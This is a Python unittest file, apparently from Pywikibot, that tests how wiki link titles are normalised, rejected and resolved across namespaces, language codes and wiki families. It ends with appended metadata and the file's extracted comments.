        self.assertEqual(Link('Category:' + 'X' * 248, site).title, 'X' * 248)
        self.assertEqual(Link('A%20B', site).title, 'A B')
        # NOTE(review): the next three lines look identical here; in the
        # upstream file they presumably use different Unicode compositions
        # of 'é' (precomposed vs. combining) that normalize to the same
        # title — confirm against the original source before relying on it.
        self.assertEqual(Link('A é B', site).title, 'A é B')
        self.assertEqual(Link('A é B', site).title, 'A é B')
        self.assertEqual(Link('A é B', site).title, 'A é B')
        # Whitespace variants collapse to a single ASCII space.
        self.assertEqual(Link('A B', site).title, 'A B')
        self.assertEqual(Link('A   B', site).title, 'A B')
        anchor_link = Link('A | B', site)
        self.assertEqual(anchor_link.title, 'A')
        self.assertEqual(anchor_link.anchor, ' B')
        section_link = Link('A%23B', site)
        self.assertEqual(section_link.title, 'A')
        self.assertEqual(section_link.section, 'B')

    def test_invalid(self):
        """Test that invalid titles raise InvalidTitle exception."""
        exception_message_regex = (
            r'^The link does not contain a page title$'
        )
        texts_to_test = ['', ':', '__ __', ' __ ']
        for text in texts_to_test:
            with self.assertRaisesRegex(
                    InvalidTitle,
                    exception_message_regex):
                Link(text, self.get_site()).parse()

        # Bad characters forbidden regardless of wgLegalTitleChars
        # (u|) in the regexes accepts both Python 2 and 3 repr forms.
        def generate_contains_illegal_chars_exc_regex(text):
            exc_regex = (
                r'^(u|)\'{}\' contains illegal char\(s\) (u|)\'{}\'$'
                .format(re.escape(text), re.escape(text[2])))
            return exc_regex
        texts_to_test = ['A [ B', 'A ] B', 'A { B', 'A } B', 'A < B', 'A > B']
        for text in texts_to_test:
            with self.assertRaisesRegex(
                    InvalidTitle,
                    generate_contains_illegal_chars_exc_regex(text)):
                Link(text, self.get_site()).parse()

        # URL encoding
        # %XX is understood by wikimedia but not %XXXX
        with self.assertRaisesRegex(
                InvalidTitle,
                r'^(u|)\'A%23B\' contains illegal char\(s\) (u|)\'%23\'$'):
            Link('A%2523B', self.get_site()).parse()

        # A link is invalid if their (non-)talk page would be in another
        # namespace than the link's "other" namespace
        with self.assertRaisesRegex(
                InvalidTitle,
                (r'The \(non-\)talk page of (u|)\'Talk:File:Example.svg\''
                 r' is a valid title in another namespace.')):
            Link('Talk:File:Example.svg', self.get_site()).parse()

        # Directory navigation
        def generate_contains_dot_combinations_exc_regex(text):
            exc_regex = (r'^\(contains \. / combinations\): (u|)\'{}\'$'
                         .format(re.escape(text)))
            return exc_regex
        texts_to_test = ['.', '..', './Sandbox', '../Sandbox', 'Foo/./Sandbox',
                         'Foo/../Sandbox', 'Sandbox/.', 'Sandbox/..']
        for text in texts_to_test:
            with self.assertRaisesRegex(
                    InvalidTitle,
                    generate_contains_dot_combinations_exc_regex(text)):
                Link(text, self.get_site()).parse()

        # Tilde
        def generate_contains_tilde_exc_regex(text):
            exc_regex = r'^\(contains ~~~\): (u|)\'%s\'$' % re.escape(text)
            return exc_regex
        texts_to_test = ['A ~~~ Name', 'A ~~~~ Signature', 'A ~~~~~ Timestamp']
        for text in texts_to_test:
            with self.assertRaisesRegex(
                    InvalidTitle,
                    generate_contains_tilde_exc_regex(text)):
                Link(text, self.get_site()).parse()

        # Overlength
        def generate_overlength_exc_regex(text):
            exc_regex = r'^\(over 255 bytes\): (u|)\'%s\'$' % re.escape(text)
            return exc_regex
        texts_to_test = [('x' * 256), ('Invalid:' + 'X' * 248)]
        for text in texts_to_test:
            with self.assertRaisesRegex(
                    InvalidTitle,
                    generate_overlength_exc_regex(text)):
                Link(text, self.get_site()).parse()

        # Namespace prefix without actual title
        def generate_has_no_title_exc_regex(text):
            exc_regex = r'^(u|)\'{}\' has no title\.$'.format(re.escape(text))
            return exc_regex
        texts_to_test = ['Talk:', 'Category: ', 'Category: #bar']
        for text in texts_to_test:
            with self.assertRaisesRegex(
                    InvalidTitle,
                    generate_has_no_title_exc_regex(text.strip())):
                Link(text, self.get_site()).parse()

    def test_relative(self):
        """Test that relative links are handled properly."""
        # Subpage
        page = Page(self.get_site(), 'Foo')
        rel_link = Link('/bar', page)
        self.assertEqual(rel_link.title, 'Foo/bar')
        self.assertEqual(rel_link.site, self.get_site())
        # Subpage of Page with section
        page = Page(self.get_site(), 'Foo#Baz')
        rel_link = Link('/bar', page)
        self.assertEqual(rel_link.title, 'Foo/bar')
        self.assertEqual(rel_link.site, self.get_site())
        # Non-subpage link text beginning with slash
        abs_link = Link('/bar', self.get_site())
        self.assertEqual(abs_link.title, '/bar')
class Issue10254TestCase(DefaultDrySiteTestCase):

    """Test T102461 (Python issue 10254)."""

    def setUp(self):
        """Set up test case."""
        super(Issue10254TestCase, self).setUp()
        # Save the module-level reference so tearDown can restore it even
        # if a test monkey-patches pywikibot.page.unicodedata.
        self._orig_unicodedata = pywikibot.page.unicodedata

    def tearDown(self):
        """Tear down test case."""
        pywikibot.page.unicodedata = self._orig_unicodedata
        super(Issue10254TestCase, self).tearDown()

    def test_no_change(self):
        """Test T102461 (Python issue 10254) is not encountered."""
        # NOTE(review): the literal presumably contains combining
        # characters whose NFC normalization must be preserved exactly —
        # confirm byte equality with the upstream file.
        title = 'Li̍t-sṳ́'
        link = Link(title, self.site)
        self.assertEqual(link.title, 'Li̍t-sṳ́')
# ---- The first set of tests are explicit links, starting with a ':'.
class TestPartiallyQualifiedExplicitLinkSameSiteParser(LinkTestCase):

    """Link tests."""

    family = 'wikipedia'
    code = 'en'
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* on enwp and verify site, title and namespace."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site())
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_partially_qualified_NS0_code(self):
        """Test ':wikipedia:Main Page' on enwp is namespace 4."""
        self._assert_parsed(':wikipedia:Main Page', 'Main Page', 4)

    def test_partially_qualified_NS1_code(self):
        """Test ':wikipedia:Talk:Main Page' on enwp is namespace 4."""
        self._assert_parsed(':wikipedia:Talk:Main Page', 'Talk:Main Page', 4)

    def test_partially_qualified_NS0_family(self):
        """Test ':en:Main Page' on enwp is namespace 0."""
        self._assert_parsed(':en:Main Page', 'Main Page', 0)

    def test_partially_qualified_NS1_family(self):
        """Test ':en:Talk:Main Page' on enwp is namespace 1."""
        self._assert_parsed(':en:Talk:Main Page', 'Main Page', 1)
class TestPartiallyQualifiedExplicitLinkDifferentCodeParser(LinkTestCase):

    """Link tests."""

    family = 'wikipedia'
    code = 'en'
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* with dewp as default and verify it targets enwp."""
        config.mylang = 'de'
        config.family = 'wikipedia'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site())
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_partially_qualified_NS0_family(self):
        """Test ':en:Main Page' on dewp is namespace 0."""
        self._assert_parsed(':en:Main Page', 'Main Page', 0)

    def test_partially_qualified_NS1_family(self):
        """Test ':en:Talk:Main Page' on dewp is namespace 1."""
        self._assert_parsed(':en:Talk:Main Page', 'Main Page', 1)
class TestPartiallyQualifiedExplicitLinkDifferentFamilyParser(LinkTestCase):

    """Link tests."""

    family = 'wikipedia'
    code = 'en'
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* with enws as default and verify the result."""
        config.mylang = 'en'
        config.family = 'wikisource'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site())
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_partially_qualified_NS0_code(self):
        """Test ':wikipedia:Main Page' on enws is namespace 0."""
        self._assert_parsed(':wikipedia:Main Page', 'Main Page', 0)

    def test_partially_qualified_NS1_code(self):
        """Test ':wikipedia:Talk:Main Page' on enws is ns 1."""
        self._assert_parsed(':wikipedia:Talk:Main Page', 'Main Page', 1)
class TestFullyQualifiedSameNamespaceFamilyParser(LinkTestCase):

    """Link tests."""

    family = 'wikipedia'
    code = 'en'
    cached = True

    def _parsed(self, text):
        """Parse *text* with enwp configured as the default site."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        lnk = Link(text)
        lnk.parse()
        return lnk

    def test_namespace_vs_family(self):
        """Test namespace is selected before family."""
        lnk = self._parsed(':wikipedia:en:Main Page')
        self.assertEqual(lnk.title, 'En:Main Page')
        self.assertEqual(lnk.namespace, 4)

        lnk = self._parsed(':wikipedia:en:Talk:Main Page')
        self.assertEqual(lnk.site, self.get_site())
        self.assertEqual(lnk.title, 'En:Talk:Main Page')
        self.assertEqual(lnk.namespace, 4)
class TestFullyQualifiedExplicitLinkSameFamilyParser(LinkTestCase):

    """Link tests."""

    family = 'wikipedia'
    code = 'en'
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* on enwp and verify site, title and namespace."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site())
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_fully_qualified_NS0_code(self):
        """Test ':en:wikipedia:Main Page' on enwp is namespace 4."""
        self._assert_parsed(':en:wikipedia:Main Page', 'Main Page', 4)

    def test_fully_qualified_NS1_code(self):
        """Test ':en:wikipedia:Talk:Main Page' on enwp is namespace 4."""
        self._assert_parsed(':en:wikipedia:Talk:Main Page',
                            'Talk:Main Page', 4)
class TestFullyQualifiedExplicitLinkDifferentFamilyParser(LinkTestCase):

    """Test link to a different family."""

    sites = {
        'enws': {
            'family': 'wikisource',
            'code': 'en'
        },
        'enwp': {
            'family': 'wikipedia',
            'code': 'en'
        }
    }
    cached = True

    def test_fully_qualified_NS0_code(self):
        """Test ':en:wikipedia:Main Page' on enws is namespace 0."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link(':en:wikipedia:Main Page')
        link.parse()
        # Resolves to the wikipedia family site, not the local enws one.
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 0)

    def test_fully_qualified_NS1_code(self):
        """Test ':en:wikipedia:Talk:Main Page' on enws is namespace 1."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link(':en:wikipedia:Talk:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 1)

    def test_fully_qualified_NS0_family(self):
        """Test ':wikipedia:en:Main Page' on enws is namespace 0."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link(':wikipedia:en:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 0)

    def test_fully_qualified_NS1_family(self):
        """Test ':wikipedia:en:Talk:Main Page' on enws is namespace 1."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link(':wikipedia:en:Talk:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 1)
class TestFullyQualifiedExplicitLinkNoLangConfigFamilyParser(LinkTestCase):

    """Test link from family without lang code to a different family."""

    sites = {
        'wikidata': {
            'family': 'wikidata',
            'code': 'wikidata'
        },
        'enwp': {
            'family': 'wikipedia',
            'code': 'en'
        }
    }
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* with wikidata as default and verify against enwp."""
        config.mylang = 'wikidata'
        config.family = 'wikidata'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site('enwp'))
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_fully_qualified_NS0_code(self):
        """Test ':en:wikipedia:Main Page' on wikidata is namespace 4."""
        self._assert_parsed(':en:wikipedia:Main Page', 'Main Page', 4)

    def test_fully_qualified_NS1_code(self):
        """Test ':en:wikipedia:Talk:Main Page' on wikidata is namespace 4."""
        self._assert_parsed(':en:wikipedia:Talk:Main Page',
                            'Talk:Main Page', 4)

    def test_fully_qualified_NS0_family(self):
        """Test ':wikipedia:en:Main Page' on wikidata is namespace 0."""
        self._assert_parsed(':wikipedia:en:Main Page', 'Main Page', 0)

    def test_fully_qualified_NS1_family(self):
        """Test ':wikipedia:en:Talk:Main Page' on wikidata is namespace 1."""
        self._assert_parsed(':wikipedia:en:Talk:Main Page', 'Main Page', 1)
class TestFullyQualifiedNoLangFamilyExplicitLinkParser(LinkTestCase):
    """Test wikibase links."""
    sites = {
        'wikidata': {
            'family': 'wikidata',
            'code': 'wikidata'
        },
        'enwp': {
            'family': 'wikipedia',
            'code': 'en'
        },
        'test.wp': {
            'family': 'wikipedia',
            'code': 'test'
        },
    }
    cached = True
    def _parse_on_enwp(self, text):
        """Parse *text* with enwp configured as the source site."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        link = Link(text)
        link.parse()
        return link
    def _check(self, link, site_key, title, namespace):
        """Assert *link* resolved to the site registered as *site_key*."""
        self.assertEqual(link.site, self.get_site(site_key))
        self.assertEqual(link.title, title)
        self.assertEqual(link.namespace, namespace)
    def test_fully_qualified_NS0_code(self):
        """Test ':testwiki:wikidata:Q6' on enwp is namespace 0."""
        self._check(self._parse_on_enwp(':testwiki:wikidata:Q6'),
                    'wikidata', 'Q6', 0)
    def test_fully_qualified_NS1_code(self):
        """Test ':testwiki:wikidata:Talk:Q6' on enwp is namespace 1."""
        self._check(self._parse_on_enwp(':testwiki:wikidata:Talk:Q6'),
                    'wikidata', 'Q6', 1)
    def test_fully_qualified_NS0_family(self):
        """Test ':wikidata:testwiki:Q6' on enwp is namespace 0."""
        self._check(self._parse_on_enwp(':wikidata:testwiki:Q6'),
                    'test.wp', 'Q6', 0)
    def test_fully_qualified_NS1_family(self):
        """Test ':wikidata:testwiki:Talk:Q6' on enwp is namespace 1."""
        self._check(self._parse_on_enwp(':wikidata:testwiki:Talk:Q6'),
                    'test.wp', 'Q6', 1)
class TestFullyQualifiedOneSiteFamilyExplicitLinkParser(LinkTestCase):
    """Test links to one site target family."""
    family = 'species'
    code = 'species'
    cached = True
    def test_fully_qualified_NS0_code(self):
        """Test ':species:species:Main Page' on enwp is namespace 0."""
        # Source site is enwp (configured below); the doubled prefix
        # still resolves to the single-site species wiki.
        config.mylang = 'en'
        config.family = 'wikipedia'
        link = Link(':species:species:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site())
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 1)
# ---- Tests of a Link without colons, which shouldn't be interwikis, follow.
class TestPartiallyQualifiedImplicitLinkSameSiteParser(LinkTestCase):
    """Test partially qualified links to same site."""
    family = 'wikipedia'
    code = 'en'
    cached = True
    def _parse_on_enwp(self, text):
        """Parse *text* with enwp configured as the source site."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        link = Link(text)
        link.parse()
        return link
    def _check(self, link, title, namespace):
        """Assert *link* resolved to the default site (enwp)."""
        self.assertEqual(link.site, self.get_site())
        self.assertEqual(link.title, title)
        self.assertEqual(link.namespace, namespace)
    def test_partially_qualified_NS0_code(self):
        """Test 'wikipedia:Main Page' on enwp is namespace 4."""
        self._check(self._parse_on_enwp('wikipedia:Main Page'),
                    'Main Page', 4)
    def test_partially_qualified_NS1_code(self):
        """Test 'wikipedia:Talk:Main Page' on enwp is namespace 4."""
        self._check(self._parse_on_enwp('wikipedia:Talk:Main Page'),
                    'Talk:Main Page', 4)
    def test_partially_qualified_NS0_family(self):
        """Test 'en:Main Page' on enwp is namespace 0."""
        self._check(self._parse_on_enwp('en:Main Page'), 'Main Page', 0)
    def test_partially_qualified_NS1_family(self):
        """Test 'en:Talk:Main Page' on enwp is namespace 1."""
        self._check(self._parse_on_enwp('en:Talk:Main Page'),
                    'Main Page', 1)
class TestPartiallyQualifiedImplicitLinkDifferentCodeParser(LinkTestCase):
    """Test partially qualified links to different code."""
    family = 'wikipedia'
    code = 'en'
    cached = True
    def _parse_on_dewp(self, text):
        """Parse *text* with dewp configured as the source site."""
        config.mylang = 'de'
        config.family = 'wikipedia'
        link = Link(text)
        link.parse()
        return link
    def _check(self, link, title, namespace):
        """Assert *link* resolved to the default site (enwp)."""
        self.assertEqual(link.site, self.get_site())
        self.assertEqual(link.title, title)
        self.assertEqual(link.namespace, namespace)
    def test_partially_qualified_NS0_family(self):
        """Test 'en:Main Page' on dewp is namespace 0."""
        self._check(self._parse_on_dewp('en:Main Page'), 'Main Page', 0)
    def test_partially_qualified_NS1_family(self):
        """Test 'en:Talk:Main Page' on dewp is namespace 1."""
        self._check(self._parse_on_dewp('en:Talk:Main Page'),
                    'Main Page', 1)
class TestPartiallyQualifiedImplicitLinkDifferentFamilyParser(LinkTestCase):
    """Test partially qualified links to different family."""
    family = 'wikipedia'
    code = 'en'
    cached = True
    def _parse_on_enws(self, text):
        """Parse *text* with enws configured as the source site."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link(text)
        link.parse()
        return link
    def _check(self, link, title, namespace):
        """Assert *link* resolved to the default site (enwp)."""
        self.assertEqual(link.site, self.get_site())
        self.assertEqual(link.title, title)
        self.assertEqual(link.namespace, namespace)
    def test_partially_qualified_NS0_code(self):
        """Test 'wikipedia:Main Page' on enws is namespace 0."""
        self._check(self._parse_on_enws('wikipedia:Main Page'),
                    'Main Page', 0)
    def test_partially_qualified_NS1_code(self):
        """Test 'wikipedia:Talk:Main Page' on enws is ns 1."""
        self._check(self._parse_on_enws('wikipedia:Talk:Main Page'),
                    'Main Page', 1)
class TestFullyQualifiedImplicitLinkSameFamilyParser(LinkTestCase):
    """Test implicit fully qualified links within the same family."""
    family = 'wikipedia'
    code = 'en'
    cached = True
    def test_fully_qualified_NS0_code(self):
        """Test 'en:wikipedia:Main Page' on enwp is namespace 4."""
        # Per the asserts: 'en:' points back to the same site, and the
        # remaining 'wikipedia:' prefix ends up as namespace 4 (project).
        config.mylang = 'en'
        config.family = 'wikipedia'
        link = Link('en:wikipedia:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site())
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 4)
    def test_fully_qualified_NS1_code(self):
        """Test 'en:wikipedia:Talk:Main Page' on enwp is namespace 4."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        link = Link('en:wikipedia:Talk:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site())
        self.assertEqual(link.title, 'Talk:Main Page')
        self.assertEqual(link.namespace, 4)
class TestFullyQualifiedImplicitLinkDifferentFamilyParser(LinkTestCase):
    """Test link to a different family without a leading colon."""
    sites = {
        'enws': {
            'family': 'wikisource',
            'code': 'en'
        },
        'enwp': {
            'family': 'wikipedia',
            'code': 'en'
        }
    }
    cached = True
    def _parse_on_enws(self, text):
        """Parse *text* with enws configured as the source site."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link(text)
        link.parse()
        return link
    def _check_enwp(self, link, title, namespace):
        """Assert *link* resolved to enwp with the given title/namespace."""
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, title)
        self.assertEqual(link.namespace, namespace)
    def test_fully_qualified_NS0_code(self):
        """Test 'en:wikipedia:Main Page' on enws is namespace 0."""
        self._check_enwp(self._parse_on_enws('en:wikipedia:Main Page'),
                         'Main Page', 0)
    def test_fully_qualified_NS1_code(self):
        """Test 'en:wikipedia:Talk:Main Page' on enws is namespace 1."""
        self._check_enwp(self._parse_on_enws('en:wikipedia:Talk:Main Page'),
                         'Main Page', 1)
    def test_fully_qualified_NS0_family(self):
        """Test 'wikipedia:en:Main Page' on enws is namespace 0."""
        self._check_enwp(self._parse_on_enws('wikipedia:en:Main Page'),
                         'Main Page', 0)
    def test_fully_qualified_NS1_family(self):
        """Test 'wikipedia:en:Talk:Main Page' on enws is namespace 1."""
        self._check_enwp(self._parse_on_enws('wikipedia:en:Talk:Main Page'),
                         'Main Page', 1)
class TestFullyQualifiedImplicitLinkNoLangConfigFamilyParser(LinkTestCase):
    """Test implicit link from family without lang code to other family."""
    sites = {
        'wikidata': {
            'family': 'wikidata',
            'code': 'wikidata'
        },
        'enwp': {
            'family': 'wikipedia',
            'code': 'en'
        }
    }
    cached = True
    def _parse_on_wikidata(self, text):
        """Parse *text* with wikidata configured as the source site."""
        config.mylang = 'wikidata'
        config.family = 'wikidata'
        link = Link(text)
        link.parse()
        return link
    def _check_enwp(self, link, title, namespace):
        """Assert *link* resolved to enwp with the given title/namespace."""
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, title)
        self.assertEqual(link.namespace, namespace)
    def test_fully_qualified_NS0_code(self):
        """Test 'en:wikipedia:Main Page' on wikidata is namespace 4."""
        self._check_enwp(self._parse_on_wikidata('en:wikipedia:Main Page'),
                         'Main Page', 4)
    def test_fully_qualified_NS1_code(self):
        """Test 'en:wikipedia:Talk:Main Page' on wikidata isn't namespace 1."""
        self._check_enwp(
            self._parse_on_wikidata('en:wikipedia:Talk:Main Page'),
            'Talk:Main Page', 4)
    def test_fully_qualified_NS0_family(self):
        """Test 'wikipedia:en:Main Page' on wikidata is namespace 0."""
        self._check_enwp(self._parse_on_wikidata('wikipedia:en:Main Page'),
                         'Main Page', 0)
    def test_fully_qualified_NS1_family(self):
        """Test 'wikipedia:en:Talk:Main Page' on wikidata is namespace 1."""
        self._check_enwp(
            self._parse_on_wikidata('wikipedia:en:Talk:Main Page'),
            'Main Page', 1)
class TestFullyQualifiedNoLangFamilyImplicitLinkParser(LinkTestCase):
    """Test wikibase links without a leading colon."""
    family = 'wikidata'
    code = 'test'
    cached = True
    def _parse_on_enwp(self, text):
        """Parse *text* with enwp configured as the source site."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        link = Link(text)
        link.parse()
        return link
    def _check(self, link, site, title, namespace):
        """Assert *link* resolved to *site* with the given title/namespace."""
        self.assertEqual(link.site, site)
        self.assertEqual(link.title, title)
        self.assertEqual(link.namespace, namespace)
    def test_fully_qualified_NS0_code(self):
        """Test 'testwiki:wikidata:Q6' on enwp is namespace 0."""
        self._check(self._parse_on_enwp('testwiki:wikidata:Q6'),
                    pywikibot.Site('wikidata', 'wikidata'), 'Q6', 0)
    def test_fully_qualified_NS1_code(self):
        """Test 'testwiki:wikidata:Talk:Q6' on enwp is namespace 1."""
        self._check(self._parse_on_enwp('testwiki:wikidata:Talk:Q6'),
                    pywikibot.Site('wikidata', 'wikidata'), 'Q6', 1)
    def test_fully_qualified_NS0_family(self):
        """Test 'wikidata:testwiki:Q6' on enwp is namespace 0."""
        self._check(self._parse_on_enwp('wikidata:testwiki:Q6'),
                    pywikibot.Site('test', 'wikipedia'), 'Q6', 0)
    def test_fully_qualified_NS1_family(self):
        """Test 'wikidata:testwiki:Talk:Q6' on enwp is namespace 1."""
        self._check(self._parse_on_enwp('wikidata:testwiki:Talk:Q6'),
                    pywikibot.Site('test', 'wikipedia'), 'Q6', 1)
class TestFullyQualifiedOneSiteFamilyImplicitLinkParser(LinkTestCase):
    """Test links to one site target family without a leading colon."""
    family = 'species'
    code = 'species'
    cached = True
    def _parse_on_enwp(self, text):
        """Parse *text* with enwp configured as the source site."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        link = Link(text)
        link.parse()
        return link
    def _check(self, link, title, namespace):
        """Assert *link* resolved to the default (species) site."""
        self.assertEqual(link.site, self.get_site())
        self.assertEqual(link.title, title)
        self.assertEqual(link.namespace, namespace)
    def test_fully_qualified_NS0_family_code(self):
        """Test 'species:species:Main Page' on enwp is namespace 0."""
        self._check(self._parse_on_enwp('species:species:Main Page'),
                    'Main Page', 0)
    def test_fully_qualified_NS1_family_code(self):
        """Test 'species:species:Talk:Main Page' on enwp is namespace 1."""
        self._check(self._parse_on_enwp('species:species:Talk:Main Page'),
                    'Main Page', 1)
    def test_fully_qualified_NS0_code(self):
        """Test 'species:Main Page' on enwp is namespace 0."""
        self._check(self._parse_on_enwp('species:Main Page'),
                    'Main Page', 0)
    def test_fully_qualified_NS1_code(self):
        """Test 'species:Talk:Main Page' on enwp is namespace 1."""
        self._check(self._parse_on_enwp('species:Talk:Main Page'),
                    'Main Page', 1)
class TestEmptyTitle(TestCase):
    """Test links which contain no title."""
    family = 'wikipedia'
    code = 'en'
    def test_interwiki_mainpage(self):
        """Test that Link allows links without a title to the main page."""
        link = Link('en:', self.get_site())
        link.parse()
        self.assertEqual(link.site, self.get_site())
        self.assertEqual(link.title, '')
        self.assertEqual(link.namespace, 0)
    def test_interwiki_namespace_without_title(self):
        """Test that Link doesn't allow links without a title."""
        link = Link('en:Help:', self.get_site())
        self.assertRaisesRegex(
            InvalidTitle, "'en:Help:' has no title.", link.parse)
    def test_no_text(self):
        """Test that Link doesn't allow empty links."""
        link = Link('', self.get_site())
        self.assertRaisesRegex(
            InvalidTitle, 'The link does not contain a page title',
            link.parse)
    def test_namespace_lookalike(self):
        """Test that Link does only detect valid namespaces."""
        # 'CAT:' is not a namespace here, so the colon stays in the
        # title and the link remains in the main namespace.
        link = Link('CAT:', self.get_site())
        link.parse()
        self.assertEqual(link.site, self.get_site())
        self.assertEqual(link.title, 'CAT:')
        self.assertEqual(link.namespace, 0)
        link = Link('en:CAT:', self.get_site())
        link.parse()
        self.assertEqual(link.site, self.get_site())
        self.assertEqual(link.title, 'CAT:')
        self.assertEqual(link.namespace, 0)
class TestInvalidInterwikiLinks(WikimediaDefaultSiteTestCase):
    """Test links to non-wikis."""
    family = 'wikipedia'
    code = 'en'
    def test_non_wiki_prefix(self):
        """Test that Link fails if the interwiki prefix is not a wiki."""
        link = Link('bugzilla:1337', source=self.site)
        self.assertRaisesRegex(
            Error,
            'bugzilla:1337 is not a local page on wikipedia:en, and the '
            'interwiki prefix bugzilla is not supported by Pywikibot!',
            link.parse)
    def test_other_wiki_prefix(self):
        """Test that Link fails if the interwiki prefix is an unknown family."""
        link = Link('bulba:this-will-never-work', source=self.site)
        self.assertRaisesRegex(
            Error,
            'bulba:this-will-never-work is not a local page on wikipedia:en, '
            'and the interwiki prefix bulba is not supported by Pywikibot!',
            link.parse)
class TestSiteLink(WikimediaDefaultSiteTestCase):
    """Test parsing namespaces when creating SiteLinks."""
    def _test_link(self, link, title, namespace, site_code, site_fam):
        """Test the separate contents of the link."""
        self.assertEqual(link.title, title)
        self.assertEqual(link.namespace, namespace)
        self.assertEqual(link.site, Site(site_code, site_fam))
        self.assertEqual(link.badges, [])
    def test_site_link(self):
        """Test title/namespace parsing of SiteLink for several dbnames."""
        # Localized namespace prefixes (Mall:, Vorlage:) are stripped
        # from the title; a plain colon inside a title is kept as-is.
        self._test_link(SiteLink('Foobar', 'enwiki'),
                        'Foobar', Namespace.MAIN, 'en', 'wikipedia')
        self._test_link(SiteLink('Mall:!!', 'svwiki'),
                        '!!', Namespace.TEMPLATE, 'sv', 'wikipedia')
        self._test_link(SiteLink('Vorlage:!!', 'dewikibooks'),
                        '!!', Namespace.TEMPLATE, 'de', 'wikibooks')
        self._test_link(SiteLink('Ai Weiwei: Never Sorry', 'enwiki'),
                        'Ai Weiwei: Never Sorry', Namespace.MAIN,
                        'en', 'wikipedia')
if __name__ == '__main__': # pragma: no cover
    # Swallow unittest's SystemExit so running the module directly
    # does not propagate an exit code.
    try:
        unittest.main()
    except SystemExit:
        pass
|
en
| 0.730256
|
# -*- coding: utf-8 -*- Test Link functionality. # # (C) Pywikibot team, 2014-2019 # # Distributed under the terms of the MIT license. # Test C{Link.create_separated}. Test the separate contents of the link. Test combinations of parameters. # ---- Tests checking if the parser does (not) accept (in)valid titles Test parsing links with DrySite. The DrySite is using the builtin namespaces which behaviour is controlled in this repository so namespace aware tests do work, even when the actual default site is using completely different namespaces. Test that valid titles are correctly normalized. # Length is 256 total, but only title part matters #233; B', site).title, 'A é B') #x00E9; B', site).title, 'A é B') #160; B', site).title, 'A B') Test that invalid titles raise InvalidTitle exception. # Bad characters forbidden regardless of wgLegalTitleChars # URL encoding # %XX is understood by wikimedia but not %XXXX # A link is invalid if their (non-)talk page would be in another # namespace than the link's "other" namespace # Directory navigation # Tilde # Overlength # Namespace prefix without actual title #bar'] Test that relative links are handled properly. # Subpage # Subpage of Page with section #Baz') # Non-subpage link text beginning with slash Test T102461 (Python issue 10254). Set up test case. Tear down test case. Test T102461 (Python issue 10254) is not encountered. # ---- The first set of tests are explicit links, starting with a ':'. Link tests. Test ':wikipedia:Main Page' on enwp is namespace 4. Test ':wikipedia:Talk:Main Page' on enwp is namespace 4. Test ':en:Main Page' on enwp is namespace 0. Test ':en:Talk:Main Page' on enwp is namespace 1. Link tests. Test ':en:Main Page' on dewp is namespace 0. Test ':en:Talk:Main Page' on dewp is namespace 1. Link tests. Test ':wikipedia:Main Page' on enws is namespace 0. Test ':wikipedia:Talk:Main Page' on enws is ns 1. Link tests. Test namespace is selected before family. Link tests. 
